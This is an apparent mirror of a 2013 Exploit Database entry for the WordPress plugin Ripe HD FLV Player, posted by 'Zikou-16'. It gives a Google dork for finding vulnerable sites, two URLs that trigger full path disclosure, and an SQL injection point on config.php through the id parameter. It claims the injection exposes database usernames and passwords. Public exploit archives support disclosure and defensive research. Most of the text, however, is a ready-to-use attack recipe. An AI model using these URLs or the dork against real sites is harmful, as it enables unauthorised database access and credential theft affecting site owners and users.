WordPress Plugin Ripe HD FLV Player – SQL Injection

• Exploit Database
• 18 阅读

• 作者： Zikou-16
  日期： 2013-01-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24229/

• -------------------------------------------------------------------
  Wordpress plugins - ripe-hd-player FD/SQL Injection Vulnerability 
  -------------------------------------------------------------------
  # Vendor: http://www.hitasoft.com/products.php 
  #####
  # Author => Zikou-16
  # E-mail => zikou16x@gmail.com
  # Facebook => http://fb.me/Zikou.se
  # Google Dork => inurl:"/wp-content/plugins/ripe-hd-player/"
  # Tested on : Windows 7 , Backtrack 5r3
  ####
   
  #=> Exploit Info :
  ------------------
  # The attacker can access to the database & get username & password ....... &disclosure the Full Path 
  ------------------
  
  #=> Exploit :
  ------------------
  1#=> Full Path Disclosure :
  
  http://[target]/[path]/wp-content/plugins/ripe-hd-player/index.php
  http://[target]/[path]/wp-content/plugins/ripe-hd-player/installer.php 
  
  -------
  2#=> SQL Injection 
  
  http://[target]/[path]/wp-content/plugins/ripe-hd-player/config.php?id=2'[inj3ct h3re]
  
  ------------------------------ <= Th3 End ^_^'